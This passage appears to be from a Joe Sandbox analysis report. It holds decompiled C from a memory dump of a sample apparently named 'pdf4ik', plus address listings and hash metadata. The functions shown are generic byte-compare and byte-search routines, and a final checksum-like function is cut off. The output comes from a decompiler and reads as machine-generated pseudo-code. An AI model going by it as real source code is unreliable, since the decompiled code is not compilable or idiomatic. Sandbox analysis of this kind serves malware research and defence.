                                        0x00000000
                                        0x29dba6a3
                                        0x29dba67e
                                        0x29dba67e
                                        0x29dba684
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29dba684
                                        0x29dba5ec
                                        0x29dba5ee
                                        0x29dba603
                                        0x29dba60b
                                        0x29dba60d
                                        0x29dba622
                                        0x29dba62a
                                        0x29dba62c
                                        0x29dba641
                                        0x29dba649
                                        0x29dba64b
                                        0x29dba654
                                        0x29dba654
                                        0x29dba654
                                        0x00000000
                                        0x29dba64b
                                        0x29dba635
                                        0x29dba635
                                        0x29dba63b
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29dba63b
                                        0x29dba616
                                        0x29dba616
                                        0x29dba61c
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29dba61c
                                        0x29dba5f7
                                        0x29dba5f7
                                        0x29dba5fd
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29dba5fd
                                        0x29dba565
                                        0x29dba567
                                        0x29dba57c
                                        0x29dba584
                                        0x29dba586
                                        0x29dba59b
                                        0x29dba5a3
                                        0x29dba5a5
                                        0x29dba5ba
                                        0x29dba5c2
                                        0x29dba5c4
                                        0x29dba5cd
                                        0x29dba5cd
                                        0x29dba5cd
                                        0x00000000
                                        0x29dba5c4
                                        0x29dba5ae
                                        0x29dba5ae
                                        0x29dba5b4
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29dba5b4
                                        0x29dba58f
                                        0x29dba58f
                                        0x29dba595
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29dba595
                                        0x29dba570
                                        0x29dba570
                                        0x29dba576
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29dba576
                                        0x29dba4de
                                        0x29dba4e0
                                        0x29dba4f5
                                        0x29dba4fd
                                        0x29dba4ff
                                        0x29dba514
                                        0x29dba51c
                                        0x29dba51e
                                        0x29dba533
                                        0x29dba53b
                                        0x29dba53d
                                        0x29dba546
                                        0x29dba546
                                        0x29dba546
                                        0x00000000
                                        0x29dba53d
                                        0x29dba527
                                        0x29dba527
                                        0x29dba52d
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29dba52d
                                        0x29dba508
                                        0x29dba508
                                        0x29dba50e
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29dba50e
                                        0x29dba4e9
                                        0x29dba4e9
                                        0x29dba4ef
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29dba450
                                        0x29dba450
                                        0x29dba453
                                        0x29dba457
                                        0x29dba459
                                        0x29dba46e
                                        0x29dba46e
                                        0x29dba472
                                        0x29dba476
                                        0x29dba478
                                        0x29dba48d
                                        0x29dba48d
                                        0x29dba491
                                        0x29dba495
                                        0x29dba497
                                        0x29dba4ac
                                        0x29dba4ac
                                        0x29dba4b0
                                        0x29dba4b4
                                        0x29dba4b6
                                        0x29dba4b8
                                        0x29dba4bf
                                        0x29dba4bf
                                        0x29dba4bf
                                        0x00000000
                                        0x29dba4b6
                                        0x29dba499
                                        0x29dba49d
                                        0x29dba4a0
                                        0x29dba4a0
                                        0x29dba4a6
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29dba4a6
                                        0x29dba47a
                                        0x29dba47e
                                        0x29dba481
                                        0x29dba481
                                        0x29dba487
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29dba487
                                        0x29dba45b
                                        0x29dba45f
                                        0x29dba462
                                        0x29dba462
                                        0x29dba468
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29dba468
                                        0x29dba0a3
                                        0x29dba0a3
                                        0x00000000

                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                                        • Instruction ID: 684b432443cfaca46e11b1c0fbba725efb2f22bfe2e7e8f7be94853a989c26a3
                                        • Opcode Fuzzy Hash: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                                        • Instruction Fuzzy Hash: 99C19473D1E9B305873A452D452832FFFE15E81A8171BC399CDD53F98AC6236E06A5D0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29DBA0AA Relevance: .3, Instructions: 326COMMONCrypto
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E29DBA0AA(void* __eax, void* __ecx) {
				void* _t177;
				signed int _t178;
				void* _t181;
				signed char _t186;
				signed char _t187;
				signed char _t188;
				signed char _t190;
				signed char _t191;
				signed int _t197;
				signed int _t263;
				void* _t266;
				void* _t268;
				void* _t270;
				void* _t272;
				void* _t274;
				void* _t276;
				void* _t279;
				void* _t281;
				void* _t283;
				void* _t286;
				void* _t288;
				void* _t290;
				void* _t293;
				void* _t295;
				void* _t297;
				void* _t300;
				void* _t302;
				void* _t304;

				_t181 = __ecx;
				_t177 = __eax;
				if( *((intOrPtr*)(__eax - 0x1c)) ==  *((intOrPtr*)(__ecx - 0x1c))) {
					_t263 = 0;
					L11:
					if(_t263 != 0) {
						goto L1;
					}
					_t186 =  *(_t177 - 0x18);
					if(_t186 ==  *(_t181 - 0x18)) {
						_t263 = 0;
						L22:
						if(_t263 != 0) {
							goto L1;
						}
						_t187 =  *(_t177 - 0x14);
						if(_t187 ==  *(_t181 - 0x14)) {
							_t263 = 0;
							L33:
							if(_t263 != 0) {
								goto L1;
							}
							_t188 =  *(_t177 - 0x10);
							if(_t188 ==  *(_t181 - 0x10)) {
								_t263 = 0;
								L44:
								if(_t263 != 0) {
									goto L1;
								}
								if( *(_t177 - 0xc) ==  *(_t181 - 0xc)) {
									_t263 = 0;
									L55:
									if(_t263 != 0) {
										goto L1;
									}
									_t190 =  *(_t177 - 8);
									if(_t190 ==  *(_t181 - 8)) {
										_t263 = 0;
										L66:
										if(_t263 != 0) {
											goto L1;
										}
										_t191 =  *(_t177 - 4);
										if(_t191 ==  *(_t181 - 4)) {
											_t178 = 0;
											L78:
											if(_t178 == 0) {
												_t178 = 0;
											}
											L80:
											return _t178;
										}
										_t266 = (_t191 & 0x000000ff) - ( *(_t181 - 4) & 0x000000ff);
										if(_t266 == 0) {
											L70:
											_t268 = ( *(_t177 - 3) & 0x000000ff) - ( *(_t181 - 3) & 0x000000ff);
											if(_t268 == 0) {
												L72:
												_t270 = ( *(_t177 - 2) & 0x000000ff) - ( *(_t181 - 2) & 0x000000ff);
												if(_t270 == 0) {
													L75:
													_t178 = ( *(_t177 - 1) & 0x000000ff) - ( *(_t181 - 1) & 0x000000ff);
													if(_t178 != 0) {
														_t176 = (0 | _t178 > 0x00000000) - 1; // -1
														_t178 = (_t178 > 0) + _t176;
													}
													goto L78;
												}
												_t197 = (0 | _t270 > 0x00000000) + (0 | _t270 > 0x00000000) - 1;
												if(_t197 == 0) {
													goto L75;
												}
												L74:
												_t178 = _t197;
												goto L78;
											}
											_t197 = (0 | _t268 > 0x00000000) + (0 | _t268 > 0x00000000) - 1;
											if(_t197 != 0) {
												goto L74;
											}
											goto L72;
										}
										_t197 = (0 | _t266 > 0x00000000) + (0 | _t266 > 0x00000000) - 1;
										if(_t197 != 0) {
											goto L74;
										}
										goto L70;
									}
									_t272 = (_t190 & 0x000000ff) - ( *(_t181 - 8) & 0x000000ff);
									if(_t272 == 0) {
										L59:
										_t274 = ( *(_t177 - 7) & 0x000000ff) - ( *(_t181 - 7) & 0x000000ff);
										if(_t274 == 0) {
											L61:
											_t276 = ( *(_t177 - 6) & 0x000000ff) - ( *(_t181 - 6) & 0x000000ff);
											if(_t276 == 0) {
												L63:
												_t263 = ( *(_t177 - 5) & 0x000000ff) - ( *(_t181 - 5) & 0x000000ff);
												if(_t263 != 0) {
													_t151 = (0 | _t263 > 0x00000000) - 1; // -1
													_t263 = (_t263 > 0) + _t151;
												}
												goto L66;
											}
											_t145 = (0 | _t276 > 0x00000000) - 1; // -1
											_t263 = (_t276 > 0) + _t145;
											if(_t263 != 0) {
												goto L1;
											}
											goto L63;
										}
										_t139 = (0 | _t274 > 0x00000000) - 1; // -1
										_t263 = (_t274 > 0) + _t139;
										if(_t263 != 0) {
											goto L1;
										}
										goto L61;
									}
									_t133 = (0 | _t272 > 0x00000000) - 1; // -1
									_t263 = (_t272 > 0) + _t133;
									if(_t263 != 0) {
										goto L1;
									}
									goto L59;
								}
								_t279 = ( *(_t177 - 0xc) & 0x000000ff) - ( *(_t181 - 0xc) & 0x000000ff);
								if(_t279 == 0) {
									L48:
									_t281 = ( *(_t177 - 0xb) & 0x000000ff) - ( *(_t181 - 0xb) & 0x000000ff);
									if(_t281 == 0) {
										L50:
										_t283 = ( *(_t177 - 0xa) & 0x000000ff) - ( *(_t181 - 0xa) & 0x000000ff);
										if(_t283 == 0) {
											L52:
											_t263 = ( *(_t177 - 9) & 0x000000ff) - ( *(_t181 - 9) & 0x000000ff);
											if(_t263 != 0) {
												_t126 = (0 | _t263 > 0x00000000) - 1; // -1
												_t263 = (_t263 > 0) + _t126;
											}
											goto L55;
										}
										_t120 = (0 | _t283 > 0x00000000) - 1; // -1
										_t263 = (_t283 > 0) + _t120;
										if(_t263 != 0) {
											goto L1;
										}
										goto L52;
									}
									_t114 = (0 | _t281 > 0x00000000) - 1; // -1
									_t263 = (_t281 > 0) + _t114;
									if(_t263 != 0) {
										goto L1;
									}
									goto L50;
								}
								_t108 = (0 | _t279 > 0x00000000) - 1; // -1
								_t263 = (_t279 > 0) + _t108;
								if(_t263 != 0) {
									goto L1;
								}
								goto L48;
							}
							_t286 = (_t188 & 0x000000ff) - ( *(_t181 - 0x10) & 0x000000ff);
							if(_t286 == 0) {
								L37:
								_t288 = ( *(_t177 - 0xf) & 0x000000ff) - ( *(_t181 - 0xf) & 0x000000ff);
								if(_t288 == 0) {
									L39:
									_t290 = ( *(_t177 - 0xe) & 0x000000ff) - ( *(_t181 - 0xe) & 0x000000ff);
									if(_t290 == 0) {
										L41:
										_t263 = ( *(_t177 - 0xd) & 0x000000ff) - ( *(_t181 - 0xd) & 0x000000ff);
										if(_t263 != 0) {
											_t100 = (0 | _t263 > 0x00000000) - 1; // -1
											_t263 = (_t263 > 0) + _t100;
										}
										goto L44;
									}
									_t94 = (0 | _t290 > 0x00000000) - 1; // -1
									_t263 = (_t290 > 0) + _t94;
									if(_t263 != 0) {
										goto L1;
									}
									goto L41;
								}
								_t88 = (0 | _t288 > 0x00000000) - 1; // -1
								_t263 = (_t288 > 0) + _t88;
								if(_t263 != 0) {
									goto L1;
								}
								goto L39;
							}
							_t82 = (0 | _t286 > 0x00000000) - 1; // -1
							_t263 = (_t286 > 0) + _t82;
							if(_t263 != 0) {
								goto L1;
							}
							goto L37;
						}
						_t293 = (_t187 & 0x000000ff) - ( *(_t181 - 0x14) & 0x000000ff);
						if(_t293 == 0) {
							L26:
							_t295 = ( *(_t177 - 0x13) & 0x000000ff) - ( *(_t181 - 0x13) & 0x000000ff);
							if(_t295 == 0) {
								L28:
								_t297 = ( *(_t177 - 0x12) & 0x000000ff) - ( *(_t181 - 0x12) & 0x000000ff);
								if(_t297 == 0) {
									L30:
									_t263 = ( *(_t177 - 0x11) & 0x000000ff) - ( *(_t181 - 0x11) & 0x000000ff);
									if(_t263 != 0) {
										_t75 = (0 | _t263 > 0x00000000) - 1; // -1
										_t263 = (_t263 > 0) + _t75;
									}
									goto L33;
								}
								_t69 = (0 | _t297 > 0x00000000) - 1; // -1
								_t263 = (_t297 > 0) + _t69;
								if(_t263 != 0) {
									goto L1;
								}
								goto L30;
							}
							_t63 = (0 | _t295 > 0x00000000) - 1; // -1
							_t263 = (_t295 > 0) + _t63;
							if(_t263 != 0) {
								goto L1;
							}
							goto L28;
						}
						_t57 = (0 | _t293 > 0x00000000) - 1; // -1
						_t263 = (_t293 > 0) + _t57;
						if(_t263 != 0) {
							goto L1;
						}
						goto L26;
					}
					_t300 = (_t186 & 0x000000ff) - ( *(_t181 - 0x18) & 0x000000ff);
					if(_t300 == 0) {
						L15:
						_t302 = ( *(_t177 - 0x17) & 0x000000ff) - ( *(_t181 - 0x17) & 0x000000ff);
						if(_t302 == 0) {
							L17:
							_t304 = ( *(_t177 - 0x16) & 0x000000ff) - ( *(_t181 - 0x16) & 0x000000ff);
							if(_t304 == 0) {
								L19:
								_t263 = ( *(_t177 - 0x15) & 0x000000ff) - ( *(_t181 - 0x15) & 0x000000ff);
								if(_t263 != 0) {
									_t50 = (0 | _t263 > 0x00000000) - 1; // -1
									_t263 = (_t263 > 0) + _t50;
								}
								goto L22;
							}
							_t44 = (0 | _t304 > 0x00000000) - 1; // -1
							_t263 = (_t304 > 0) + _t44;
							if(_t263 != 0) {
								goto L1;
							}
							goto L19;
						}
						_t38 = (0 | _t302 > 0x00000000) - 1; // -1
						_t263 = (_t302 > 0) + _t38;
						if(_t263 != 0) {
							goto L1;
						}
						goto L17;
					}
					_t32 = (0 | _t300 > 0x00000000) - 1; // -1
					_t263 = (_t300 > 0) + _t32;
					if(_t263 != 0) {
						goto L1;
					}
					goto L15;
				} else {
					__esi = __dl & 0x000000ff;
					__edx =  *(__ecx - 0x1c) & 0x000000ff;
					__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x1c) & 0x000000ff);
					if(__esi == 0) {
						L4:
						__esi =  *(__eax - 0x1b) & 0x000000ff;
						__edx =  *(__ecx - 0x1b) & 0x000000ff;
						__esi = ( *(__eax - 0x1b) & 0x000000ff) - ( *(__ecx - 0x1b) & 0x000000ff);
						if(__esi == 0) {
							L6:
							__esi =  *(__eax - 0x1a) & 0x000000ff;
							__edx =  *(__ecx - 0x1a) & 0x000000ff;
							__esi = ( *(__eax - 0x1a) & 0x000000ff) - ( *(__ecx - 0x1a) & 0x000000ff);
							if(__esi == 0) {
								L8:
								__esi =  *(__eax - 0x19) & 0x000000ff;
								__edx =  *(__ecx - 0x19) & 0x000000ff;
								__esi = ( *(__eax - 0x19) & 0x000000ff) - ( *(__ecx - 0x19) & 0x000000ff);
								if(__esi != 0) {
									__edx = 0;
									_t25 = (0 | __esi > 0x00000000) - 1; // -1
									__esi = (__esi > 0) + _t25;
								}
								goto L11;
							}
							__edx = 0;
							__edx = 0 | __esi > 0x00000000;
							_t19 = __edx - 1; // -1
							__esi = __edx + _t19;
							if(__edx + _t19 != 0) {
								goto L1;
							}
							goto L8;
						}
						__edx = 0;
						__edx = 0 | __esi > 0x00000000;
						_t13 = __edx - 1; // -1
						__esi = __edx + _t13;
						if(__edx + _t13 != 0) {
							goto L1;
						}
						goto L6;
					}
					__edx = 0;
					__edx = 0 | __esi > 0x00000000;
					_t7 = __edx - 1; // -1
					__esi = __edx + _t7;
					if(__edx + _t7 != 0) {
						goto L1;
					}
					goto L4;
				}
				L1:
				_t178 = _t263;
				goto L80;
			}































                                        0x29dba0aa
                                        0x29dba0aa
                                        0x29dba0b0
                                        0x29dba11b
                                        0x29dba11d
                                        0x29dba11f
                                        0x00000000
                                        0x00000000
                                        0x29dba121
                                        0x29dba127
                                        0x29dba19e
                                        0x29dba1a0
                                        0x29dba1a2
                                        0x00000000
                                        0x00000000
                                        0x29dba1a8
                                        0x29dba1ae
                                        0x29dba225
                                        0x29dba227
                                        0x29dba229
                                        0x00000000
                                        0x00000000
                                        0x29dba22f
                                        0x29dba235
                                        0x29dba2ac
                                        0x29dba2ae
                                        0x29dba2b0
                                        0x00000000
                                        0x00000000
                                        0x29dba2bc
                                        0x29dba334
                                        0x29dba336
                                        0x29dba338
                                        0x00000000
                                        0x00000000
                                        0x29dba33e
                                        0x29dba344
                                        0x29dba3bb
                                        0x29dba3bd
                                        0x29dba3bf
                                        0x00000000
                                        0x00000000
                                        0x29dba3c5
                                        0x29dba3cb
                                        0x29dba43a
                                        0x29dba43c
                                        0x29dba43e
                                        0x29dba440
                                        0x29dba440
                                        0x29dba442
                                        0x29dbb0e6
                                        0x29dbb0e6
                                        0x29dba3d4
                                        0x29dba3d6
                                        0x29dba3e7
                                        0x29dba3ef
                                        0x29dba3f1
                                        0x29dba402
                                        0x29dba40a
                                        0x29dba40c
                                        0x29dba421
                                        0x29dba429
                                        0x29dba42b
                                        0x29dba434
                                        0x29dba434
                                        0x29dba434
                                        0x00000000
                                        0x29dba42b
                                        0x29dba415
                                        0x29dba41b
                                        0x00000000
                                        0x00000000
                                        0x29dba41d
                                        0x29dba41d
                                        0x00000000
                                        0x29dba41d
                                        0x29dba3fa
                                        0x29dba400
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29dba400
                                        0x29dba3df
                                        0x29dba3e5
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29dba3e5
                                        0x29dba34d
                                        0x29dba34f
                                        0x29dba364
                                        0x29dba36c
                                        0x29dba36e
                                        0x29dba383
                                        0x29dba38b
                                        0x29dba38d
                                        0x29dba3a2
                                        0x29dba3aa
                                        0x29dba3ac
                                        0x29dba3b5
                                        0x29dba3b5
                                        0x29dba3b5
                                        0x00000000
                                        0x29dba3ac
                                        0x29dba396
                                        0x29dba396
                                        0x29dba39c
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29dba39c
                                        0x29dba377
                                        0x29dba377
                                        0x29dba37d
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29dba37d
                                        0x29dba358
                                        0x29dba358
                                        0x29dba35e
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29dba35e
                                        0x29dba2c6
                                        0x29dba2c8
                                        0x29dba2dd
                                        0x29dba2e5
                                        0x29dba2e7
                                        0x29dba2fc
                                        0x29dba304
                                        0x29dba306
                                        0x29dba31b
                                        0x29dba323
                                        0x29dba325
                                        0x29dba32e
                                        0x29dba32e
                                        0x29dba32e
                                        0x00000000
                                        0x29dba325
                                        0x29dba30f
                                        0x29dba30f
                                        0x29dba315
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29dba315
                                        0x29dba2f0
                                        0x29dba2f0
                                        0x29dba2f6
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29dba2f6
                                        0x29dba2d1
                                        0x29dba2d1
                                        0x29dba2d7
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29dba2d7
                                        0x29dba23e
                                        0x29dba240
                                        0x29dba255
                                        0x29dba25d
                                        0x29dba25f
                                        0x29dba274
                                        0x29dba27c
                                        0x29dba27e
                                        0x29dba293
                                        0x29dba29b
                                        0x29dba29d
                                        0x29dba2a6
                                        0x29dba2a6
                                        0x29dba2a6
                                        0x00000000
                                        0x29dba29d
                                        0x29dba287
                                        0x29dba287
                                        0x29dba28d
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29dba28d
                                        0x29dba268
                                        0x29dba268
                                        0x29dba26e
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29dba26e
                                        0x29dba249
                                        0x29dba249
                                        0x29dba24f
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29dba24f
                                        0x29dba1b7
                                        0x29dba1b9
                                        0x29dba1ce
                                        0x29dba1d6
                                        0x29dba1d8
                                        0x29dba1ed
                                        0x29dba1f5
                                        0x29dba1f7
                                        0x29dba20c
                                        0x29dba214
                                        0x29dba216
                                        0x29dba21f
                                        0x29dba21f
                                        0x29dba21f
                                        0x00000000
                                        0x29dba216
                                        0x29dba200
                                        0x29dba200
                                        0x29dba206
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29dba206
                                        0x29dba1e1
                                        0x29dba1e1
                                        0x29dba1e7
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29dba1e7
                                        0x29dba1c2
                                        0x29dba1c2
                                        0x29dba1c8
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29dba1c8
                                        0x29dba130
                                        0x29dba132
                                        0x29dba147
                                        0x29dba14f
                                        0x29dba151
                                        0x29dba166
                                        0x29dba16e
                                        0x29dba170
                                        0x29dba185
                                        0x29dba18d
                                        0x29dba18f
                                        0x29dba198
                                        0x29dba198
                                        0x29dba198
                                        0x00000000
                                        0x29dba18f
                                        0x29dba179
                                        0x29dba179
                                        0x29dba17f
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29dba17f
                                        0x29dba15a
                                        0x29dba15a
                                        0x29dba160
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29dba160
                                        0x29dba13b
                                        0x29dba13b
                                        0x29dba141
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29dba0b2
                                        0x29dba0b2
                                        0x29dba0b5
                                        0x29dba0b9
                                        0x29dba0bb
                                        0x29dba0cc
                                        0x29dba0cc
                                        0x29dba0d0
                                        0x29dba0d4
                                        0x29dba0d6
                                        0x29dba0e7
                                        0x29dba0e7
                                        0x29dba0eb
                                        0x29dba0ef
                                        0x29dba0f1
                                        0x29dba102
                                        0x29dba102
                                        0x29dba106
                                        0x29dba10a
                                        0x29dba10c
                                        0x29dba10e
                                        0x29dba115
                                        0x29dba115
                                        0x29dba115
                                        0x00000000
                                        0x29dba10c
                                        0x29dba0f3
                                        0x29dba0f7
                                        0x29dba0fa
                                        0x29dba0fa
                                        0x29dba100
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29dba100
                                        0x29dba0d8
                                        0x29dba0dc
                                        0x29dba0df
                                        0x29dba0df
                                        0x29dba0e5
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29dba0e5
                                        0x29dba0bd
                                        0x29dba0c1
                                        0x29dba0c4
                                        0x29dba0c4
                                        0x29dba0ca
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29dba0ca
                                        0x29dba0a3
                                        0x29dba0a3
                                        0x00000000

                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 21b74c51e355f1ada917146b454bba93dbff062365e48e41ecc74cc68dac6f4d
                                        • Instruction ID: e6ada4b40e1c0bce8beed0674b09a2bc32d63f20e2b0bfcfc70b6f3005c98275
                                        • Opcode Fuzzy Hash: 21b74c51e355f1ada917146b454bba93dbff062365e48e41ecc74cc68dac6f4d
                                        • Instruction Fuzzy Hash: FEB1B373D1E5B3058779456D452822FFFE26EC1A8031BC399CCD53FA89C627AE02A5D0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29DAEB70 Relevance: .1, Instructions: 76COMMONCrypto
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E29DAEB70(signed int _a4, signed char _a8, intOrPtr _a12) {
				intOrPtr _t13;
				void* _t14;
				signed char _t20;
				signed char _t24;
				signed int _t27;
				signed char _t32;
				unsigned int _t33;
				signed char _t35;
				signed char _t37;
				signed int _t39;

				_t13 = _a12;
				if(_t13 == 0) {
					L11:
					return _t13;
				} else {
					_t39 = _a4;
					_t20 = _a8;
					if((_t39 & 0x00000003) == 0) {
						L5:
						_t14 = _t13 - 4;
						if(_t14 < 0) {
							L8:
							_t13 = _t14 + 4;
							if(_t13 == 0) {
								goto L11;
							} else {
								while(1) {
									_t24 =  *_t39;
									_t39 = _t39 + 1;
									if((_t24 ^ _t20) == 0) {
										goto L20;
									}
									_t13 = _t13 - 1;
									if(_t13 != 0) {
										continue;
									} else {
										goto L11;
									}
									goto L24;
								}
								goto L20;
							}
						} else {
							_t20 = ((_t20 << 8) + _t20 << 0x10) + (_t20 << 8) + _t20;
							do {
								_t27 =  *_t39 ^ _t20;
								_t39 = _t39 + 4;
								if(((_t27 ^ 0xffffffff ^ 0x7efefeff + _t27) & 0x81010100) == 0) {
									goto L12;
								} else {
									_t32 =  *(_t39 - 4) ^ _t20;
									if(_t32 == 0) {
										return _t39 - 4;
									} else {
										_t33 = _t32 ^ _t20;
										if(_t33 == 0) {
											return _t39 - 3;
										} else {
											_t35 = _t33 >> 0x00000010 ^ _t20;
											if(_t35 == 0) {
												return _t39 - 2;
											} else {
												if((_t35 ^ _t20) == 0) {
													goto L20;
												} else {
													goto L12;
												}
											}
										}
									}
								}
								goto L24;
								L12:
								_t14 = _t14 - 4;
							} while (_t14 >= 0);
							goto L8;
						}
					} else {
						while(1) {
							_t37 =  *_t39;
							_t39 = _t39 + 1;
							if((_t37 ^ _t20) == 0) {
								break;
							}
							_t13 = _t13 - 1;
							if(_t13 == 0) {
								goto L11;
							} else {
								if((_t39 & 0x00000003) != 0) {
									continue;
								} else {
									goto L5;
								}
							}
							goto L24;
						}
						L20:
						return _t39 - 1;
					}
				}
				L24:
			}













                                        0x29daeb70
                                        0x29daeb77
                                        0x29daebcc
                                        0x29daebcc
                                        0x29daeb79
                                        0x29daeb79
                                        0x29daeb7f
                                        0x29daeb89
                                        0x29daeba1
                                        0x29daeba1
                                        0x29daeba4
                                        0x29daebb8
                                        0x29daebb8
                                        0x29daebbb
                                        0x00000000
                                        0x29daebbd
                                        0x29daebbd
                                        0x29daebbd
                                        0x29daebbf
                                        0x29daebc4
                                        0x00000000
                                        0x00000000
                                        0x29daebc6
                                        0x29daebc9
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29daebc9
                                        0x00000000
                                        0x29daebbd
                                        0x29daeba6
                                        0x29daebb3
                                        0x29daebd2
                                        0x29daebd4
                                        0x29daebe2
                                        0x29daebeb
                                        0x00000000
                                        0x29daebed
                                        0x29daebf0
                                        0x29daebf2
                                        0x29daec1c
                                        0x29daebf4
                                        0x29daebf4
                                        0x29daebf6
                                        0x29daec16
                                        0x29daebf8
                                        0x29daebfb
                                        0x29daebfd
                                        0x29daec10
                                        0x29daebff
                                        0x29daec01
                                        0x00000000
                                        0x29daec03
                                        0x00000000
                                        0x29daec03
                                        0x29daec01
                                        0x29daebfd
                                        0x29daebf6
                                        0x29daebf2
                                        0x00000000
                                        0x29daebcd
                                        0x29daebcd
                                        0x29daebcd
                                        0x00000000
                                        0x29daebb7
                                        0x29daeb8b
                                        0x29daeb8b
                                        0x29daeb8b
                                        0x29daeb8d
                                        0x29daeb92
                                        0x00000000
                                        0x00000000
                                        0x29daeb94
                                        0x29daeb97
                                        0x00000000
                                        0x29daeb99
                                        0x29daeb9f
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29daeb9f
                                        0x00000000
                                        0x29daeb97
                                        0x29daec06
                                        0x29daec0a
                                        0x29daec0a
                                        0x29daeb89
                                        0x00000000

                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                        • Instruction ID: fe9f420bc8642f5c327d5b1f78aedbccb715b0cca451067e2cddbf97e5d46e78
                                        • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                        • Instruction Fuzzy Hash: 99112E7720418183D60C8A3EC4FC5ABA3D5EFC9221B69477ED2C34BE58D2269177F520
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29DABA00 Relevance: .1, Instructions: 70COMMONCrypto
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E29DABA00(signed char* __ecx, unsigned int __edx) {
				signed int _t26;
				signed int _t27;
				signed char* _t46;
				unsigned int _t47;
				unsigned int _t80;

				_t47 = __edx;
				_t46 = __ecx;
				if(__ecx != 0) {
					_t27 =  !_t26;
					if(__edx >= 8) {
						_t80 = __edx >> 3;
						do {
